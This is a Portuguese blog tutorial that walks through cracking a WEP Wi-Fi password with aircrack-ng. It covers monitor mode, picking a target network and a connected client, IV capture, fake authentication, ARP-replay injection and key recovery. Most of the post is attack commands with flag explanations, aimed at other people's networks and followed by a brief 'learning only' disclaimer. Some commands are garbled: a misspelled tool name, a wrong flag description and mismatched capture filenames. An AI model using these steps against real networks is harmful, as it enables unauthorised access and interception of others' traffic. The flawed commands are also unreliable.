Para snifar, capturar e descriptografar as senhas vamos utilizar o pacote Aircrack (aircrack-ng, airomon-ng e airodump-ng). O Aircrack é um pacote de ferramentas muito poderoso para realizar ataques a redes Wireless.
Levando em consideração que você já tem um Linux instalado (aqui estou usando o Mint) em SEU NOTEBOOK, vamos começar:
Se estiver conectado em qualquer rede WiFi, desconecte-se.
Os comandos serão dados no terminal, ou
seja, via linha de comando e a grande maioria deles exige logon como
Root portanto, pra não ter que ficar digitando a sua senha a todo
momento, abra o terminal que você vai usar e, logo de cara, digite: # sudo su
Agora vamos ao que interessa:
Primeiramente iremos colocar a interface de rede em modo Monitor, para capturar nossos pacotes. O comando é:
airmon-ng start wlan0
Após executar este comando, será criada
uma interface de rede com a nomenclatura “mon0”, que irá capturar todos
os pacotes que precisamos para descriptografar a senha wep ou wpa.
- Agora iremos escanear todas as redes disponíveis;
Com o comando a seguir iremos ver todas
os dispositivos de rede sem fio ao alcance da nossa interface de rede. É
possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dados sobre o nosso alvo:
- BSSID
- CANAL
- CIPHER
- AUTH
- ESSID
É preciso também anotar um MAC-ADDRESS que esteja conectado ao alvo escolhido.
airodump-ng mon0
Hora de capturar os vetores de inicialização. No
comando a serguir, iremos capturar pacotes IVS que trafegam na rede. O
nome do arquivo a ser gerado é você quem define, e o canal é o canal do
alvo que você definiu.
airdump-ng –ivs -w captura-ivs -c 6 mon0
Explicando o comando:
- -i = Captura apenas pacotes que contenham Ivs (–ivs);
- -w = Nome do arquivo que será gerado com os dados capturados;
- -c = Canal do Access Point;
- mon0 = interface de rede em modo monitoramento.
Agora iremos enviar um pedido de falsa
autenticação com um MAC associado ao acces point que queremos quebrar a
senha, por exemplo:
aireplay-ng -1 0 -e NOME_DA_REDE -a MAC_ROTEADOR -h MAC_USUÁRIO mon0
- -1 = Essa opção enviao a autenticação falsa;
- 0 = Aqui é o tempo para reassociação, em segundos
- -e = ESSID do alvo, ou seja, o nome do Access Point
- -a = Mac-Address do Access Point alvo
- -h = Mac-Address de alguém que esteja conectado (associado) ao access Point
- mon0 = interface de rede em modo monitor.
Feito isso, aguarde que os vetores sejam
capturados. Para acelerar o processo de captura de IVS, podemos tentar
enviar um Arp request para a rede, na tentativa que alguma maquina
receba e comece a enviar arp replay para nós. Isso fará com que o
tráfego de dados aumente rapidamente:
Enviando Arp request para a rede:
aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0
- -3 = Opção para arp request;
- -b = Mac-Address do Access Point alvo
- -h = Mac-Address associado ao Access Point, no nosso caso o mac que identificamos como conectado ao AP “rede-segura”
- mon0 = interface de rede em modo monitor.
Após alguns minutos de captura de pacotes
(lembrar que só é possível capturar pacotes se tivermos pessoas trafego
de dados na rede) iremos analisar o arquivos gerado e tentar extrair a
senha do Dispositivo.
aircrack-ng -a 1 capturar-ivs-redesegura
- -a = Modo para forçar o ataque
- -1 = wep (se fosse WPA usaríamos o -2)
Aqui iremos selecionar a nossa rede alvo,
pois os dados foram capturados por canal, assim todos as redes que
estão no canal “6” entram no aquivo.
Feito isso, a senha literalmente cairá no seu colo.
Frase do dia:
A prática Hacker deve ser sempre exercida
de forma ética, e nunca para prejudicar, furtar, ou sacanear ninguém. É
importante saber que existem várias outras formas de capturar senhas,
essa é apenas uma.
É importante lembrar, também, que da
mesma forma que você quebrou a senha, é possível descobrir quem está
conectado à ela, ou seja, use este artigo para aprendizado apenas.
0 comentários:
Postar um comentário